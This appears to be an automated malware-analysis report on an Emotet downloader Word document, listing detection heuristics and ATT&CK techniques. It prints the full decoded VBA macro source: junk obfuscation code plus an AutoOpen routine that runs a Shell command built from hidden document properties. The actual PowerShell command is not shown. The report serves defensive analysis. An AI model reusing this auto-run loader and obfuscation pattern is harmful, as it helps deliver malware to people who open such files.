Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', indicating it is a known downloader variant of the Emotet family. Heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that uses the Shell() function to execute PowerShell commands. This strongly suggests the document's purpose is to download and execute a second-stage payload. Note that the command string passed to Shell is assembled at run time from document metadata (the custom property "HHgkyzfssG" and the built-in "Comments" property), so the PowerShell command itself does not appear in the macro source and must be recovered from those document properties.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6344335-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `On Error Resume Next VBA.Shell$ "" + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + ActiveDocument.CustomDocumentProperties("HHgkyzfssG") + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + ActiveDocument.BuiltInDocumentProperties("Comments") + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + SNBChSZeyfC, 0 End Function`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `Sub autoopen() wCaHvFGs`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8902 bytes |

SHA-256 of macros.bas: a85243d1e5e786e4e6c349c02918ada70c38956186f5250abf8f553dc3d6385b

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub xUJ(tKc)
On Error Resume Next
Set qPnB469 = YbKV4g
yzninNZTH = Hex(ZUKMtqEE)
Do
zXcztxA = DZCBb3J / Fix(QjtOey) * slhi2 + CDate(pjnX89) + CLYV3q7 - ChrB(44 / CInt(873)) - 50 * CByte(428163408 / Atn(579 * 989 + OqYD1BAO7 - Chr(WrGZPKw)) * SnbEFPP1o * Sgn(EfgKy)) * 399437367 - 8008 + 42 + CByte(761)
Select Case njHy8
Case 470
JJFvl = Rnd(ScTw)
qDWI51es = CLng(JONF - Round(lNAB) * ZUzWMt + Chr(6))
kWRF88 = Oct(ENk + Int(uUt - CBool(43 - ChrW(7 - CInt(PgIU)) / 2 - CSng(176960005)) * cQgA1jb - CByte(2 / cops7eup4)))
Case 6528
xxHYd1 = xFoID
pVhXyrC5 = Uwf
qBjzi = Round(9032)
Case 45
pDWo = oZa
ZGMD797 = Chr(MlxrxTJjS)
DBQG66 = Hex(JFqPS8)
End Select
Dim khlDB(4018)
RxcYk55V = Rnd(gYboeGy)
Do While kafXo > OeTkm0
pbYP0E7SS = CSng(MejP)
Loop
Set orNbRG2e8 = 8
Loop Until RgF And AQwr06Fb
End Sub
Sub rXFsx(MYf)
On Error Resume Next
For Foo = WcCPF6J To NqQQ
For bVin2v = zjYWVEl6 To BoSw
swd = 975 + yugVW * 74 * Int(35 + DRgTO81) / 2235 + Fix(FLqxNr27 - aUxy00 * ZzSW - Atn(TfIU))
Next
If mgpL4C <= OACu Then
gGBW = 293473561
End If
While mko < bKk
XlPvy8X6 = Ynsi2 * 81 - 114701714 + CDate(MAwAvw36) / (cTxLB8S62 / Round(mRyC2 - Chr(108914875) / hZDx1CP * FgLL4718M) / jSzZ - 288377165 / 8185 * CStr(OMTV))
Wend
For hLt = QgQd8 To eFvkr4m
blxmxj = CSng(SsLcq6P84)
Next
Set OaEwQ8V3 = 2
GyBS83q0 = (13 + kelN4XGyD + 53 + Sgn(81 + CStr(7) - SzdhQDX / 487462085) / vCEpS * Rnd(RWPrdldf / CSng(JLfs2 - tPcWO)) / 7 / ChrB(ftfv * Sin))
Next
Set vTnIyK = CwAP
Do
Set VZA = 192723503
Flaka = 104444520 * Atn(TPdkX / gDZIuv * RZeA2vx + CByte(5946)) + (HUhOn8tD - Log(lAny) + (75 * Cos(Ufpq723 * UhtO)))
VBZx24HY = 30966165 / CMbN3613 - 4 * UxDFn20su + SySvC3 + 484342634 - (189100255 + LGzu74a)
Set oRxB55B = 174769510
Loop Until JYml61aZ Or wEvbV2
End Sub
Sub KabI6kD()
On Error Resume Next
Do
Do While qmVI0 >= 10
snR = CInt(hpyjfb50b)
Loop
Set ghdo5d3 = rdfTZB
QVC = 535948270 * 293645200
Loop Until BNm Xor 16
Cjo = 128729489 - rLsi
End Sub
Sub autoopen()
wCaHvFGs
End Sub
Sub EdxX3Cu5()
On Error Resume Next
Do While tTt >= 4
If BABn >= XdkouN Then
LdHKK3 = Nag
End If
For waA = 3 To 382096901
twXRn2 = (ZRdX9kvw + 3 + 557 + Hex(27) + (xaNi / Int(32) - 98 + Chr(kXhW)))
Next
Select Case tpkh1
Case 5998
sUeKI76 = CSng(7 - Oct(9))
llKV = CFsiGY7
Case 118
yLmU = CBool(407469117)
gMAX = CInt(sBRn2)
Case 1456
uOFowlb = 4
CCrj83s = Fix(IswC)
End Select
Do
WSeF4Cl = 231750476 * CSng(NANHh1 * Oct(9753 + Int(gbwV)) - KdzHWUk7 / CByte(65153435)) - 412 * CSng(SuAW14M38)
Loop Until TPMG8 Xor gOiV
Set FaxP1GYX5 = 386908307
Loop
ALex6g2 = qlwJ3e4U7 * Int(2) - ejvM38j * 6631 - (cRgX82II * CByte(XYkz - CDbl(278007105)) * UJYO9 - rGDIx3aC - hHU + VleM04 + LKNUWG5 * jzWW8)
For Each CsGx04SV In MORnz
AVary = Hex(29)
Select Case RbgQ37k
Case 6
nSo = 65
FsHs = ioMZ
Case 61
oclT15 = 76
XkbhrF11 = 543
End Select
AErr218 = 28756563 * SKjLSLo
If Adoa21K <= Ozequ7h Then
HMVC1 = 112245838
End If
JSmZ3 = fbBft16S + UcDCDk
ZENm4qP08 = Fusaj2D / ANNF87vmU
Next
End Sub
Sub ygt(hyPBtO)
On Error Resume Next
oDPNVF0J = (3 + Arfj89aj1 * fcRn00 * CDbl(eYAQP3) - 3277 + CSng(38) * 9 - TpW * 531082637 * Round(PTzL4n8))
Select Case YNbA
Case 40
HMeZ0 = 37
aTCS00JI = Int(377488957)
qRA = 378
Case 343300416
tfxE = CDate(ZTVsM / Oct(5) - 65 / ChrB(ETaPj))
ATBt9 = Cos(cbFWK)
iqqVZE341 = Int(PnUt3be)
End Select
rkq = (570 * CBool(rGw) * drbngy * CDbl(gNvWb00 - Sin(3195 + 7162 - BTiuUQ5T / Int(515)) + 383886529 * axds) / (95 * SPpFN / lcpFZq4Y7 / Int(3)) - (5781 / peh * rXTk2i5M / CDate(2420)))
End Sub
Sub OalVO(poZlQ6V2)
On Error Resume Next
For dubZT16h6 = 511 To 2624
Dim CnSA2()
ReDim CnSA2(2)
CnSA2(0) = 3372
CnSA2(1) = 5
XfjuYcA32 = 108974746 * ZHWlWSaa3
For Each bgs In iips4jC
SzSxFP11 = CStr(aCs)
Next
Next
For Each mrUcTm67a In qyqF69
For Each RTSs In pPoeI
SBBz93b = PqJX7B
Next
Select Case ARri6z26C
Case 631
OsF = yYuvKVv88
ozHt1bs = Fix(CfKRTD336)
Case 9
NbWA6H4C = 8070
vZqGz = CInt(292749546)
End Select
For Each bNPF771i In bHcC8ahh
uBv = 36 / CLng(CpwHe6 - CStr(Fmm)) - (9018 / CBool(5864 - Rnd(rFGQ3t + 74 + Eqq + 243))) / (JIfD4X * Int(ItDo4JR / ChrB(55)) * BKLWa0grE * CSng(AozX3MM1B / CDate(cJOVm * Tan(eSNx))))
Next
iIN = xRe * 125640127
Do While bYvV6tD6 And tJDh
PVzkn8OS0 = Yyre4
Loop
For Each pkSy0 In eyGXa
cPH = (pzLO20N / Round(9 / 8) * 163177762 + Sin(Rqwhak2j7 * CDbl(4) - 4848 - Fix(QBAXVh90)) - 92 / CSng(QtRu4W) * mAQh0G / Cos(18 + Sqr(xhZyo5)) * (5 + 6 * yCCBT / Rnd(457815554 + qhx)))
Next
Next
If lWXc5l <> 16 Then
Do While CVLK8 <> EAKB7
sIwZ58d4G = HypPpL * CByte(dFOW4) + (hyxO8K3 / CDbl(WpGbDX81S * pjYyc / Dkgf * CStr(qSZXx3006 / Round(rRrD) + jbkq35ORF + 391)))
Loop
Do
dHaK = (lDcypJ2h / CByte(54 - ief - 741 * Tan(678)) / 65 / CLng(yhFlu1x * Sgn(34433371 + 33185744 + FIq * CSng(522637742 - CByte(yvcC60w9 - 5) / 22 + 44)) + 9 * Int(356742816)) + DglRwX / 344404609)
Loop Until UQIZ5RE3 And CeLN4kP
ElseIf MOJS1iEGH Or cHuQ19 Then
lsGK = 310
Select Case LPwR9734
Case 2
CHCeM08x6 = 82
iGomS9u = Hex(5524)
Case 8883
evTRc = Int(PBjMP)
DLYK9 = CStr(Bpu + Round(106915041) * hkG / 4621)
Case 51
mWHr6Sm = 75
NPOi = Sqr(6477)
End Select
End If
End Sub
Public Function wCaHvFGs()
On Error Resume Next
VBA.Shell$ "" + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + ActiveDocument.CustomDocumentProperties("HHgkyzfssG") + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + ActiveDocument.BuiltInDocumentProperties("Comments") + aLFuBtSm + HavZEYYBxUL + SXuBEZuMe + KpsFVTRkMRv + gASKfxPGhvh + cwRmPXLVK + nHwMFtRHv + TPxegLDuUHP + SNBChSZeyfC, 0
End Function
Sub idhKr9e()
On Error Resume Next
Set ujIj866 = 106605238
Do While YxUl7j0 Xor Fzx
kLPm = GwFXdU / 71790962
KDfN72G = xGpa4In * 205712718
NmROgSjsD = vZDJs + OsLYbgx
fqSMn54T = 320024377 - GVY
Loop
PPdJ1 = XaFQ / OQKn19D
End Sub
Sub YXaTYhY7()
On Error Resume Next
Set QEU = 532061135
For lheXFj = 370299407 To zRW
Do
WyEC59cA = WcPa5x / Rnd(527624251) - 4 / Sin(484) - (9208 + CStr(3 - dtOg) + JMEI + CDbl(icMvZn) + (daZe2M9t * Fix(427575189 - Sin(okICH7X12) - yfwC663 + CInt(64 * 66)) * 4621 - CLng(grXcqo6 * Round(nxyZf4UFu / CDate(2) + 1560 - CInt(vOaHs)) + qAoo8 + EdFlUK2W)))
Loop Until HTHA04W < 6
Set gdAI = 623
Select Case xKyL
Case 7
VGn = 61
StKh = 802
zdVy3 = WusS95G
Case 1
JwFt0ssW = ChrB(KkbI47 - IxeLGa888 * 807 + JRpk562o3)
ugyMW1A7k = 4241
hBLG6V3 = ChrB(445)
Case 5289
UeJH392 = Sin(41)
ZZJKoFW9 = Chr(DpRSk3092)
pisVN77E = wgTcceF8
End Select
Next
Select Case mwPFqFw
Case 1
tLon32L6n = Sin(8789 - CInt(TlbsN6s) * 95 - NfQE9)
PvYAQ6W = kgO
wTObx = CByte(4)
Case 811
dqds7kD0 = Int(246904904)
GFTsGza = ChrW(aBhU1)
ain = wUzC714Y
End Select
End Sub
Sub saW(cYitH)
On Error Resume Next
eOXU833j8 = 337407272 * 429913118
AAyw67c = 378005288 + Tan(PCoW0Ieb7 + Int(EhJwP1O)) * 432820553 - Sgn(OHfP) + 460 * Chr(19)
End Sub